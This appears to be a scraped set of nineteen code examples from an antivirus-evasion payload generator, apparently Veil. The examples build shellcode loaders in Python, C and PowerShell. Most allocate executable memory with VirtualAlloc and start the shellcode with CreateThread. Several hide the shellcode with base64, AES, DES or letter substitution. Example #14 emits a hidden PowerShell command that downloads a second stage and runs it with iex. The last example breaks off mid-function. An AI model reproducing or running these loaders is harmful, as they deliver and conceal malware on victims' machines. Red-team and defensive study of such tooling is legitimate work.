Example #1
0
	def generate(self):
		
		# Generate Shellcode Using msfvenom
		Shellcode = self.shellcode.generate()
		
		# Base64 Encode Shellcode
		EncodedShellcode = base64.b64encode(Shellcode)    

		# Generate Random Variable Names
		ShellcodeVariableName = randomizer.randomString()
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()
		RandT = randomizer.randomString()
					
		PayloadCode = 'import ctypes\n'
		PayloadCode +=  'import base64\n'
		PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
		PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName  + ')).from_buffer(' + ShellcodeVariableName + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)

		return PayloadCode
Example #2
0
def cVirtualAlloc():
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()

    # Generate Random Variable Names
    RandShellcode = randomizer.randomString()
    RandReverseShell = randomizer.randomString()
    RandMemoryShell = randomizer.randomString()

    # Start creating our C payload
    PayloadFile = open("payload.c", "w")
    PayloadFile.write("#include <windows.h>\n")
    PayloadFile.write("#include <stdio.h>\n")
    PayloadFile.write("#include <string.h>\n")
    PayloadFile.write("int main()\n")
    PayloadFile.write("{\n")
    PayloadFile.write("    LPVOID lpvAddr;\n")
    PayloadFile.write("    HANDLE hHand;\n")
    PayloadFile.write("    DWORD dwWaitResult;\n")
    PayloadFile.write("    DWORD threadID;\n\n")
    PayloadFile.write("unsigned char buff[] = \n")
    PayloadFile.write('"' + Shellcode + '";\n\n')
    PayloadFile.write("lpvAddr = VirtualAlloc(NULL, strlen(buff),0x3000,0x40);\n")
    PayloadFile.write("RtlMoveMemory(lpvAddr,buff, strlen(buff));\n")
    PayloadFile.write("hHand = CreateThread(NULL,0,lpvAddr,NULL,0,&threadID);\n")
    PayloadFile.write("dwWaitResult = WaitForSingleObject(hHand,INFINITE);\n")
    PayloadFile.write("return 0;\n")
    PayloadFile.write("}")
    PayloadFile.close()

    # Compile our C code
    csupport.compilemingw()
Example #3
0
	def generate(self):
		
		# Generate Shellcode Using msfvenom
		self.shellcode = shellcode.Shellcode()
		Shellcode = self.shellcode.generate()
		
		# Generate Random Variable Names
		ShellcodeVariableName = randomizer.randomString()
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()
		
		# Create Payload code
		PayloadCode = 'import ctypes\n'
		PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)

		return PayloadCode
Example #4
0
def pyVirtualAlloc():
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()
    
    # Generate Random Variable Names
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()

    # Create Payload File
    PayloadFile = open('payload.py', 'w')
    PayloadFile.write('#!/usr/bin/python\n\n')
    PayloadFile.write('import ctypes\n\n')
    PayloadFile.write(ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n\n')
    PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
    PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n')
    PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n')
    PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n')
    PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))')
    PayloadFile.close()

    # Create Supporting Files and Print Exit Message
    supportfiles.supportingFiles()
    messages.endmsg()
Example #5
0
	def generate(self):
		
		# Generate Shellcode Using msfvenom
		Shellcode = self.shellcode.generate()
		
		# Generate Random Variable Names
		RandShellcode = randomizer.randomString()
		RandReverseShell = randomizer.randomString()
		RandMemoryShell = randomizer.randomString()

		# Start creating our C payload
		PayloadCode = '#include <windows.h>\n'
		PayloadCode += '#include <stdio.h>\n'
		PayloadCode += '#include <string.h>\n'
		PayloadCode += 'int main()\n'
		PayloadCode += '{\n'
		PayloadCode += '    LPVOID lpvAddr;\n'
		PayloadCode += '    HANDLE hHand;\n'
		PayloadCode += '    DWORD dwWaitResult;\n'
		PayloadCode += '    DWORD threadID;\n\n'
		PayloadCode += 'unsigned char buff[] = \n'
		PayloadCode += '\"' + Shellcode + '\";\n\n'
		PayloadCode += 'lpvAddr = VirtualAlloc(NULL, strlen(buff),0x3000,0x40);\n'
		PayloadCode += 'RtlMoveMemory(lpvAddr,buff, strlen(buff));\n'
		PayloadCode += 'hHand = CreateThread(NULL,0,lpvAddr,NULL,0,&threadID);\n'
		PayloadCode += 'dwWaitResult = WaitForSingleObject(hHand,INFINITE);\n'
		PayloadCode += 'return 0;\n'
		PayloadCode += '}\n'

		return PayloadCode
Example #6
0
def pyAESVAlloc():
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()

    # Generate Random Variable Names
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    RandDecodeAES = randomizer.randomString()
    RandCipherObject = randomizer.randomString()
    RandDecodedShellcode = randomizer.randomString()
    RandShellCode = randomizer.randomString()
    RandPadding = randomizer.randomString()

    # Set AES Block Size and Padding
    BlockSize = 32
    Padding = '{'

    # Function for Padding Encrypted Text to Fit the Block
    pad = lambda s: s + (BlockSize - len(s) % BlockSize) * Padding

    # Encrypt & Encode or Decrypt & Decode a String
    EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
    DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(Padding)

    # Generate Random AES Key
    secret = aes.aesKey()

    # Create Cipher Object with Generated Secret Key
    cipher = AES.new(secret)

    # Encrypt the String
    EncodedShellcode = EncodeAES(cipher, Shellcode)

    # Create Payload File
    PayloadFile = open('payload.py', 'w')
    PayloadFile.write('#!/usr/bin/python\n\n')
    PayloadFile.write('import ctypes\n')
    PayloadFile.write('from Crypto.Cipher import AES\n')
    PayloadFile.write('import base64\n')
    PayloadFile.write('import os\n\n')
    PayloadFile.write(RandPadding + ' = \'{\'\n') 
    PayloadFile.write(RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n')
    PayloadFile.write(RandCipherObject + ' = AES.new(\'' + secret + '\')\n')
    PayloadFile.write(RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n')
    PayloadFile.write(RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n\n')
    PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
    PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n\n')
    PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n\n')
    PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n')
    PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))')    
    PayloadFile.close()

    # Create Supporting Files and Print Exit Message
    supportfiles.supportingFiles()
    messages.endmsg()
Example #7
0
    def generate(self):

        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()

        # Generate Random Variable Names
        ShellcodeVariableName = randomizer.randomString()
        RandPtr = randomizer.randomString()
        RandBuf = randomizer.randomString()
        RandHt = randomizer.randomString()

        # Create Payload code
        PayloadCode = "import ctypes\n"
        PayloadCode += ShellcodeVariableName + " = bytearray('" + Shellcode + "')\n"
        PayloadCode += (
            RandPtr
            + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
            + ShellcodeVariableName
            + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
        )
        PayloadCode += (
            RandBuf
            + " = (ctypes.c_char * len("
            + ShellcodeVariableName
            + ")).from_buffer("
            + ShellcodeVariableName
            + ")\n"
        )
        PayloadCode += (
            "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
            + RandPtr
            + "),"
            + RandBuf
            + ",ctypes.c_int(len("
            + ShellcodeVariableName
            + ")))\n"
        )
        PayloadCode += (
            RandHt
            + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
            + RandPtr
            + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
        )
        PayloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n"

        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)

        return PayloadCode
Example #8
0
	def generate(self):
		
		# Generate Shellcode Using msfvenom
		Shellcode = self.shellcode.generate()

		# Generate Random Variable Names
		RandShellcode = randomizer.randomString()
		RandReverseShell = randomizer.randomString()
		RandMemoryShell = randomizer.randomString()

		# Start creating our C payload
		PayloadCode = 'unsigned char payload[]=\n'
		PayloadCode += '\"' + Shellcode + '\";\n'
		PayloadCode += 'int main(void) { ((void (*)())payload)();}\n'
		
		return PayloadCode
Example #9
0
	def generate(self):
		
		# randomize the output file so we don't overwrite anything
		randName = randomizer.randomString(5) + ".exe"
		outputFile = settings.TEMP_DIR + randName
		
		# the command to invoke hyperion. TODO: windows compatibility
		hyperionCommand = "wine hyperion.exe " + self.required_options["original_exe"][0] + " " + outputFile
		
		print helpers.color("\n[*] Running Hyperion on " + self.required_options["original_exe"][0] + "...")
		
		# be sure to set 'cwd' to the proper directory for hyperion so it properly runs
		p = subprocess.Popen(hyperionCommand, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=settings.VEIL_PATH+"tools/hyperion/", shell=True)
		stdout, stderr = p.communicate()
		
		try:
			# read in the output .exe from /tmp/
			f = open(outputFile, 'rb')
			PayloadCode = f.read()
			f.close()
		except IOError:
			print "\nError during Hyperion execution:\n" + helpers.color(stdout, warning=True)
			raw_input("\n[>] Press any key to return to the main menu:")
			return ""
		
		# cleanup the temporary output file. TODO: windows compatibility
		p = subprocess.Popen("rm " + outputFile, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
		stdout, stderr = p.communicate()

		return PayloadCode
Example #10
0
def pyherion(code):
	"""
	Generates a crypted hyperion'esque version of python code using
	base64 and AES with a random key, wrapped in an exec() dynamic launcher.

	code = the python source code to encrypt

	Returns the encrypted python code as a string.
	"""

	imports = list()
	codebase = list()
	
	# strip out all imports from the code so pyinstaller can properly
	# launch the code by preimporting everything at compiletime
	for line in code.split("\n"):
		if not line.startswith("#"): # ignore commented imports...
			if "import" in line:
				imports.append(line)
			else:
				codebase.append(line)
	
	# generate a random 256 AES key and build our AES cipher
	key = randomizer.randomKey(32)
	cipherEnc = AES.new(key)

	# encrypt the input file (less the imports)
	encrypted = encryption.EncodeAES(cipherEnc, "\n".join(codebase))
	
	# some random variable names
	b64var = randomizer.randomString(5)
	aesvar = randomizer.randomString(5)

	# randomize our base64 and AES importing variable
	imports.append("from base64 import b64decode as %s" %(b64var))
	imports.append("from Crypto.Cipher import AES as %s" %(aesvar))

	# shuffle up our imports
	random.shuffle(imports)
	
	# add in the AES imports and any imports found in the file
	crypted = ";".join(imports) + "\n"

	# the exec() launcher for our base64'ed encrypted string
	crypted += "exec(%s(\"%s\"))" % (b64var,base64.b64encode("exec(%s.new(\"%s\").decrypt(%s(\"%s\")).rstrip('{'))\n" %(aesvar,key,b64var,encrypted)))

	return crypted
Example #11
0
def cVoidPointer ():
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()

    # Generate Random Variable Names
    RandShellcode = randomizer.randomString()
    RandReverseShell = randomizer.randomString()
    RandMemoryShell = randomizer.randomString()

    # Start creating our C payload
    PayloadFile = open('payload.c', 'w')
    PayloadFile.write('unsigned char payload[]=\n')
    PayloadFile.write('\"' + Shellcode + '\";\n')
    PayloadFile.write('int main(void) { ((void (*)())payload)();}')
    PayloadFile.close()

    # Compile our C code
    csupport.compilemingw()
Example #12
0
	def generate(self):
		
		# Generate Shellcode Using msfvenom
		Shellcode = self.shellcode.generate()

		# Generate Random Variable Names
		RandShellcode = randomizer.randomString()
		RandReverseShell = randomizer.randomString()
		RandMemoryShell = randomizer.randomString()
		
		PayloadCode = 'from ctypes import *\n'
		PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n'
		PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
		PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
		PayloadCode += RandShellcode + '()'
	
		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)
		
		return PayloadCode
Example #13
0
	def generate(self):
		
		# Generate Shellcode Using msfvenom
		self.shellcode = shellcode.Shellcode()
		Shellcode = self.shellcode.generate()
		
		# Generate Random Variable Names
		ShellcodeVariableName = randomizer.randomString()
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()
		RandDecodeAES = randomizer.randomString()
		RandCipherObject = randomizer.randomString()
		RandDecodedShellcode = randomizer.randomString()
		RandShellCode = randomizer.randomString()
		RandPadding = randomizer.randomString()
		
    
		# Generate Random AES Key
		secret = randomizer.randomKey()

		# Create Cipher Object with Generated Secret Key
		cipher = AES.new(secret)
		
		EncodedShellcode = encryption.EncodeAES(cipher, Shellcode)
		
		# Create Payload code
		PayloadCode = 'import ctypes\n'
		PayloadCode += 'from Crypto.Cipher import AES\n'
		PayloadCode += 'import base64\n'
		PayloadCode += 'import os\n'
		PayloadCode += RandPadding + ' = \'{\'\n'
		PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
		PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
		PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
		PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
		
		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)

		return PayloadCode
Example #14
0
	def generate(self):

		self.shellcode = shellcode.Shellcode()
		shellcode = self.shellcode.generate()
		shellcode = ",0".join(shellcode.split("\\"))[1:]
		
		baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}
$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode)

		powershell_command  = unicode(baseString)
		blank_command = ""
		for char in powershell_command:
			blank_command += char + "\x00"
		powershell_command = blank_command
		powershell_command = base64.b64encode(powershell_command)

		payloadName = randomizer.randomString()
		
		# write base64 payload out to disk
		veil.PAYLOAD_SOURCE_PATH
		secondStageName = veil.PAYLOAD_SOURCE_PATH + payloadName
		f = open( secondStageName , 'w')
		f.write("powershell -Enc %s\n" %(powershell_command))
		f.close()
		
		
		# give notes to the user
		self.notes = "\n\tsecondary payload written to " + secondStageName + " ,"
		self.notes += " serve this on http://%s:%s\n" %(self.required_options["DownloadHost"][0], self.required_options["DownloadPort"][0],)
		
		
		# build our downloader shell
		downloaderCommand = "iex (New-Object Net.WebClient).DownloadString(\"http://%s:%s/%s\")\n" %(self.required_options["DownloadHost"][0], self.required_options["DownloadPort"][0], payloadName)
		powershell_command = unicode(downloaderCommand)
		blank_command = ""
		for char in powershell_command:
			blank_command += char + "\x00"
		powershell_command = blank_command
		powershell_command = base64.b64encode(powershell_command)
		
		downloaderCode = "x86 powershell command:\n"
		downloaderCode += "\tpowershell -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command
		downloaderCode += "\n\nx64 powershell command:\n"
		downloaderCode += "\t%WinDir%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command + "\n"

		return downloaderCode
Example #15
0
def pyvoidpointer():
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()

    # Generate Random Variable Names
    RandShellcode = randomizer.randomString()
    RandReverseShell = randomizer.randomString()
    RandMemoryShell = randomizer.randomString()

    # Create Payload File
    PayloadFile = open("payload.py", "w")
    PayloadFile.write("#!/usr/bin/python\n\n")
    PayloadFile.write("from ctypes import *\n\n")
    PayloadFile.write(RandReverseShell + ' = "' + Shellcode + '"\n')
    PayloadFile.write(
        RandMemoryShell + " = create_string_buffer(" + RandReverseShell + ", len(" + RandReverseShell + "))\n"
    )
    PayloadFile.write(RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n")
    PayloadFile.write(RandShellcode + "()")
    PayloadFile.close()

    # Create Supporting Files and Print Exit Message
    supportfiles.supportingFiles()
    messages.endmsg()
Example #16
0
def pyLetterSubVAlloc():
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()

    # Generate Random Variable Names
    SubbedShellcodeVariableName = randomizer.randomString()
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    RandDecodedLetter = randomizer.randomString()
    RandCorrectLetter = randomizer.randomString()
    RandSubScheme = randomizer.randomString()

    # Letter Substitution Variables
    EncodeWithThis = "c"
    DecodeWithThis = "t"

    # Create Letter Substitution Scheme
    SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis)

    # Escaping Shellcode
    Shellcode = Shellcode.encode("string_escape")

    # Create Payload File
    PayloadFile = open('payload.py', 'w')
    PayloadFile.write('#!/usr/bin/python\n\n')
    PayloadFile.write('import ctypes\n')
    PayloadFile.write('from string import maketrans\n\n')
    PayloadFile.write(RandDecodedLetter + ' = "t"\n')
    PayloadFile.write(RandCorrectLetter + ' = "c"\n\n')
    PayloadFile.write(RandSubScheme + ' = maketrans('+ RandDecodedLetter +', '+ RandCorrectLetter + ')\n\n')
    PayloadFile.write(SubbedShellcodeVariableName + ' = \"'+ Shellcode.translate(SubScheme) +'\"\n\n')
    PayloadFile.write(SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n')
    PayloadFile.write(ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n\n')
    PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
    PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n')
    PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n')
    PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n')
    PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))')
    PayloadFile.close()

    # Create Supporting Files and Print Exit Message
    supportfiles.supportingFiles()
    messages.endmsg()
Example #17
0
	def generate(self):
		
		# Generate Shellcode Using msfvenom
		self.shellcode = shellcode.Shellcode()
		Shellcode = self.shellcode.generate()
			
		# Generate Random Variable Names
		SubbedShellcodeVariableName = randomizer.randomString()
		ShellcodeVariableName = randomizer.randomString()
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()
		RandDecodedLetter = randomizer.randomString()
		RandCorrectLetter = randomizer.randomString()
		RandSubScheme = randomizer.randomString()

		# Letter Substitution Variables
		EncodeWithThis = "c"
		DecodeWithThis = "t"

		# Create Letter Substitution Scheme
		SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis)

		# Escaping Shellcode
		Shellcode = Shellcode.encode("string_escape")

		# Create Payload File
		PayloadCode = 'import ctypes\n'
		PayloadCode += 'from string import maketrans\n'
		PayloadCode += RandDecodedLetter + ' = "t"\n'
		PayloadCode += RandCorrectLetter + ' = "c"\n'
		PayloadCode += RandSubScheme + ' = maketrans('+ RandDecodedLetter +', '+ RandCorrectLetter + ')\n'
		PayloadCode += SubbedShellcodeVariableName + ' = \"'+ Shellcode.translate(SubScheme) +'\"\n'
		PayloadCode += SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n'
		PayloadCode += ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n'
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)
			
		return PayloadCode
Example #18
0
def pyDESVAlloc():
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()

    # Generate Random Variable Names
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    ShellcodeVariableName = randomizer.randomString()
    RandIV = randomizer.randomString()
    RandDESKey = randomizer.randomString()
    RandDESPayload = randomizer.randomString()
    RandEncShellCodePayload = randomizer.randomString()

    # Set IV Value and DES Key
    iv = ''.join(random.choice(string.ascii_letters) for x in range(8))
    DESKey = ''.join(random.choice(string.ascii_letters + string.digits) for x in range(8))

    # Create DES Object and encrypt our payload
    desmain = DES.new(DESKey, DES.MODE_CFB, iv)
    EncShellCode = desmain.encrypt(Shellcode)

    # Create Payload File
    PayloadFile = open('payload.py', 'w')
    PayloadFile.write('#!/usr/bin/python\n\n')
    PayloadFile.write('from Crypto.Cipher import DES\n')
    PayloadFile.write('import ctypes\n\n')
    PayloadFile.write(RandIV + ' = \'' + iv + '\'\n')
    PayloadFile.write(RandDESKey + ' = \'' + DESKey + '\'\n')
    PayloadFile.write(RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n\n')
    PayloadFile.write(RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n\n')
    PayloadFile.write(ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n')
    PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
    PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n')
    PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n')
    PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n')
    PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))')
    PayloadFile.close()

    # Create Supporting Files and Print Exit Message
    supportfiles.supportingFiles()
    messages.endmsg()
Example #19
0
	def generate(self):
		
		# Generate Shellcode Using msfvenom
		self.shellcode = shellcode.Shellcode()
		Shellcode = self.shellcode.generate()
		
		# Generate Random Variable Names
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()
		ShellcodeVariableName = randomizer.randomString()
		RandIV = randomizer.randomString()
		RandDESKey = randomizer.randomString()
		RandDESPayload = randomizer.randomString()
		RandEncShellCodePayload = randomizer.randomString()
		
		# Set IV Value and DES Key
		iv = randomizer.randomKey(8)
		DESKey = randomizer.randomKey(8)
		
		# Create DES Object and encrypt our payload
		desmain = DES.new(DESKey, DES.MODE_CFB, iv)
		EncShellCode = desmain.encrypt(Shellcode)

		# Create Payload File
		PayloadCode = 'from Crypto.Cipher import DES\n'
		PayloadCode += 'import ctypes\n'
		PayloadCode += RandIV + ' = \'' + iv + '\'\n'
		PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
